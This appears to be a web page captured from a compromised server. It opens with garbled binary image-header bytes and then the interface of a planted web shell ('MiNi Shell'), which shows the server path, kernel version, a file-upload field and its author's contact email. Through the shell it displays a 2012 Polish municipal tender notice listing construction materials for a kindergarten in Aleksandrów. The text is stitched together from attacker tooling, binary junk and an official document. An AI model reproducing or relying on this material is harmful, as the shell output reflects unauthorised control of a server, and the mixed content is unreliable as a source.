JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120719/261202-N-2012.html

<p class="kh_header"><b>Aleksandrów: Dostawa materiałów budowlanych (ciąg dalszy 4) - Budowa przedszkola jednooddziałowego (dla 30 dzieci) wraz z zapleczem  i zagospodarowaniem terenu 
z lokalizacją na działce nr 594/4 w miejscowości  Aleksandrów IV</b><br>
<b>Numer ogłoszenia: 261202 - 2012; data zamieszczenia: 19.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Aleksandrów , 23-408 Aleksandrów, woj. lubelskie, tel. 084 6875002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.aleksandrow.tensoft.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów budowlanych (ciąg dalszy 4) - Budowa przedszkola jednooddziałowego (dla 30 dzieci) wraz z zapleczem  i zagospodarowaniem terenu 
z lokalizacją na działce nr 594/4 w miejscowości  Aleksandrów IV.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wraz z rozładunkiem niżej wymienionych materiałów budowlanych dla inwestycji pn. /Budowa przedszkola jednooddziałowego (dla 30 dzieci) wraz z zapleczem  i zagospodarowaniem terenu z lokalizacją na działce nr 594/4 w miejscowości  Aleksandrów IV/, na plac budowy zlokalizowany w Aleksandrowie Czwartym na działce nr 594/4:

Lp.
	Nazwa materiału budowlanego	Ilość	Jedn.
1.		Płytki nieszkliwione gresowe impregnowane30x30x min.0,86 cm w kolorach typu QZ03 Natura (Nowa Gala) lub równoważne zbliżone kolorystycznie o nie gorszych parametrach jakościowych, kalibracja zgodna z kalibracją płytek z pozycji 2	- 83	m2
2.		Płytki nieszkliwione gresowe impregnowane 30x30x0,86 cm w kolorach typu QZ06 Natura (Nowa Gala) lub równoważne zbliżone kolorystycznie o nie gorszych parametrach jakościowych, kalibracja zgodna z kalibracją płytek z pozycji 1	- 83	m2
3.		Grunt głębokopenetrujący	- 55	dm3
4.		Płytki ceramiczne ścienne szkliwione 20x25x0,6 cm kolor biało-beżowy	- 112	m2
5.		Spoina wąska beżowa	- 65	kg
6.		Spoina wąska jasno-szara	- 75	kg
7.		Klej cienkowarstwowy do płytek ceramicznych (półelastyczny)	- 525	kg
8.		Klej cienkowarstwowy do płytek ceramicznych gresowych (półelastyczny)	- 825	kg
9.		Listwa progowa mosiężna mocowana kołkami rozporowymi (do połączenia różnych posadzek o różnicy poziomu ok. 5 mm) długość 1000 mm (lub wielokrotność)	- 5	szt
10.		Tynk akrylowy mozaikowy o gr. ziarna do 1,0 mm (M/EB3 LAKMA lub równoważny zbliżony kolorystycznie o nie gorszych parametrach jakościowych)	- 450	kg
11.		Panele podłogowe gr. min. 10 mm, odporność na ścieranie AC5, powłoka antypoślizgowa, struktura paneli - stare drewno w kolorze dąb jasny	- 150	m2
12.		Podkład z mat pod panele podłogowe gr 5 mm	- 150	m2
13.		Listwa przypodłogowa PVC do paneli (z poz. 11) z listwą maskującą mocowanie, wys. 54 mm	- 74	mb
14.		Narożnik wewnętrzny do listwy przypodłogowej do paneli	- 18	szt
15.		Narożnik zewnętrzny do listwy przypodłogowej do paneli	- 18	szt
16.		Element zamykający listwy przypodłogowej do paneli	- 6	szt
17.		Łącznik listwy przypodłogowej do paneli	- 25	szt
18.		Skrzydło wewnętrzne z ramą drewnianą 800x2000 mm pełne białe do typowej ościeżnicy metalowej, zamek z wkładką, klamka malowana: prawe 	- 1	kpl
19.		Skrzydło wewnętrzne z ramą drewnianą 900x2000 mm białe z szybą bezpieczną (hartowaną lub klejoną) o pow. szyby ok. 0,8 m2 do typowej ościeżnicy metalowej, zamek z wkładką, klamka malowana: lewe	- 1	kpl
20.		Skrzydło wewnętrzne z ramą drewnianą 900x2000 mm pełne białe do typowej ościeżnicy metalowej, zamek z wkładką, klamka malowana: prawe 	- 4	kpl
21.		Skrzydło wewnętrzne z ramą drewnianą 900x2000 mm pełne białe do typowej ościeżnicy metalowej, zamek z wkładką, klamka malowana: lewe 	- 1	kpl
22.		Skrzydło wewnętrzne z ramą drewnianą 900x2000 mm łazienkowe białe z szybą i otworami wentylacyjnymi do typowej ościeżnicy metalowej, zamek z wkładką, szyldy, klamka malowana: prawe	- 3	kpl
23.		Skrzydło wewnętrzne z ramą drewnianą 900x2000 mm łazienkowe białe z szybą i otworami wentylacyjnymi do typowej ościeżnicy metalowej, zamek z wkładką, szyldy, klamka malowana: lewe 	- 3	kpl
24.		Skrzydło wewnętrzne z ramą drewnianą 800x2000 mm łazienkowe z szybą matową lub ornament (bezpieczna) i otworami wentylacyjnymi do typowej ościeżnicy metalowej, zamek z blokadą, szyldy, klamka malowana: prawe	- 1	kpl
25.		Skrzydło wewnętrzne z ramą drewnianą 800x2000 mm  łazienkowe z szybą matową lub ornament (bezpieczna) i otworami wentylacyjnymi do typowej ościeżnicy metalowej, zamek z blokadą, szyldy, klamka malowana: lewe 	- 1	kpl
26.		Skrzydło wewnętrzne z ramą drewnianą 800x2000 mm łazienkowe białe z szybą i otworami wentylacyjnymi do typowej ościeżnicy metalowej, zamek z wkładką, szyldy, klamka malowana: prawe	- 2	kpl
27.		Skrzydło wewnętrzne z ramą drewnianą 800x2000 łazienkowe białe z szybą i otworami wentylacyjnymi do typowej ościeżnicy metalowej, zamek z wkładką, szyldy, klamka malowana: lewe	- 3	kpl
28.		Ścianka wewnętrzna z profili PVC biała o wym. zewn. szer. 1990x2010 mm ze skrzydłem drzwiowym o szer. 900 mm  (wg rys. poz. 1. załącznik nr 7 do SIWZ),  szyba zespolona niskoemisyjna U mniejszy-równy 1,1 W/m2K bezpieczna/bezpieczna obustronnie, szyldy z klamką malowaną, zamek na wkładkę, wkładka.	- 1	kpl
29.		Okno - naświetle wewnętrzne z PVC białe nieotwierane wym. zewn.  szer. 1460x980 mm,  szyba zespolona  niskoemisyjna 
U mniejszy-równy 1,1 W/m2 K bezpieczna/bezpieczna obustronnie	- 1	szt
30.		Okno - naświetle wewnętrzne z PVC białe nieotwierane wym. zewn.  szer. 550x690 mm,  szyba zespolona bezpieczna/bezpieczna	- 1	szt
31.		Ścianka wewnętrzna z profili PVC biała nieotwierana o wym. zewn. szer. 1520x2340 mm,  szyba zespolona matowa niskoemisyjna U mniejszy-równy 1,1 W/m2 K bezpieczna/bezpieczna obustronnie (wg rys. poz. 2. załącznik nr 7 do SIWZ)	- 1	szt
32.		Parapet z konglomeratu marmurowego (Botticino) gr. 20 mm pod naświetle o wym. 1470x250 mm z wykończeniem dwustronnym do muru gr. 12 cm	- 1	szt
33.		Parapet z konglomeratu marmurowego (Botticino) gr. 20 mm pod naświetle o wym. 560x250 mm z wykończeniem jednostronnym do muru gr. 12 cm	- 1	szt
34.		Miska ustępowa dla dzieci wysokości 30 cm z odpływem pionowym, zbiornik, deska sedesowa, wężyk w oplocie ze stali nierdzewnej L 30 cm, zawór kątowy do wężyka - zestaw w komplecie	- 3	kpl
35.		Kompakt WC z odpływem poziomym, zbiornik z funkcją 3/6, doprowadzenie wody z boku, wężyk w oplocie ze stali nierdzewnej L 30 cm, zawór kątowy do wężyka	 - 3	kpl
36.		Deska sedesowa twarda z metalowym  mocowaniem do miski	- 3	szt
37.		Komplet montażowy do WC	- 6	kpl
38.		Kolano przyłączeniowe do WC fi110/45°	- 3	szt
39.		Kolano przyłączeniowe do WC fi110/90°	- 3	szt
40.		Bateria prysznicowa z termostatem i wąż z końcówką 2 - funkcyjną do baterii prysznicowej ze stałym uchwytem do mocowania (chromowane)	- 1	kpl
41.		Brodzik  akrylowy 900x900x210	- 1	szt
42.		Syfon do brodzika akrylowego z czyszczeniem od góry	- 1	szt
43.		Umywalka porcelanowa  z otworem 45 cm	- 3	szt
44.		Bateria stojąca umywalkowa jednouchwytowa typowa	- 3	szt
45.		Zawór kątowy ?/3/8 do przyborów (baterii stojącej)	- 7	szt
46.		Zestaw montażowy umywalki	- 3	kpl
47.		Syfon umywalkowy PVC z sitkiem metalowym	- 3	szt
48.		Bateria ścienna zlewozmywakowa jednouchwytowa typowa (wylewka L=15 cm)	- 2	szt
49.		Umywalka porcelanowa bez otworu 45 cm	- 2	szt
50.		Umywalka porcelanowa bez otworu 50 cm	- 1	szt
51.		Umywalka porcelanowa z otworem 50 cm	- 1	szt
52.		Bateria ścienna umywalkowa jednouchwytowa typowa	- 3	szt
53.		Bateria stojąca umywalkowa jednouchwytowa typowa	- 1	szt
54.		Zlewozmywak jednokomorowy z ociekaczem ze stali nierdzewnej 60x80 z otworem	- 1	szt
55.		Szafka pod zlewozmywak 60x80 biała	- 1	szt
56.		Bateria ścienna zlewozmywakowa jednouchwytowa stojąca typowa 	- 1	szt
57.		Syfon umywalkowy PVC z sitkiem metalowym	- 4	szt
58.		Zestaw montażowy umywalki	- 4	kpl
59.		Korek PVC kanalizacyjny fi 32 	- 8	szt
60.		Korek PVC kanalizacyjny fi 50 	- 7	szt

Uwaga:
Jeżeli w niniejszej SIWZ oraz w załączonych do niej dokumentach opisano przedmiot zamówienia ze wskazaniem określeń/oznaczeń o których mowa w art. 29 ust 3 i art. 30 ust 1- 3 ustawy - Prawo zamówień publicznych, należy przyjąć, że  wskazaniu takiemu towarzyszy określenie /lub równoważny/, /równoważnie opisywanym/.
Zgodnie z art. 30 ust 4 ustawy - Prawo zamówień publicznych Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego (art.30 ust. 5 ustawy).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 44.00.00.00-0, 44.11.10.00-1, 44.11.13.00-4, 44.11.14.00-5, 44.17.00.00-2, 44.22.00.00-8, 44.22.10.00-5, 44.41.10.00-4, 44.91.11.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku. Warunek ten zostanie uznany za spełniony jeżeli wykonawca złoży oświadczenie o jego spełnieniu wg wzoru stanowiącego załącznik Nr 3 do SIWZ. Ocena spełnienia tego warunku dokonana będzie wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku. Warunek ten zostanie uznany za spełniony jeżeli wykonawca złoży oświadczenie o jego spełnieniu wg wzoru stanowiącego załącznik Nr 3 do SIWZ. Ocena spełnienia tego warunku dokonana będzie wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku. Warunek ten zostanie uznany za spełniony jeżeli wykonawca złoży oświadczenie o jego spełnieniu wg wzoru stanowiącego załącznik Nr 3 do SIWZ. Ocena spełnienia tego warunku dokonana będzie wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku. Warunek ten zostanie uznany za spełniony jeżeli wykonawca złoży oświadczenie o jego spełnieniu wg wzoru stanowiącego załącznik Nr 3 do SIWZ. Ocena spełnienia tego warunku dokonana będzie wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku. Warunek ten zostanie uznany za spełniony jeżeli wykonawca złoży oświadczenie o jego spełnieniu wg wzoru stanowiącego załącznik Nr 3 do SIWZ. Ocena spełnienia tego warunku dokonana będzie wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Złożenie wypełnionego Formularza cenowego - wg wzoru stanowiącego Załącznik Nr 2 do niniejszej SIWZ 2) W przypadku gdy Wykonawca upoważni inną osobę do reprezentowania Wykonawcy i składania oświadczeń woli w jego imieniu należy złożyć stosowne pełnomocnictwo, które należy załączyć do oferty w formie oryginału lub kserokopii potwierdzonej notarialnie. 3) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.aleksandrow.tensoft.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Aleksandrów, Aleksandrów Drugi 380, 23-408 Aleksandrów, pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2012 godzina 10:00, miejsce: Urząd Gminy Aleksandrów, Aleksandrów Drugi 380, 23-408 Aleksandrów, pokój nr 7 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com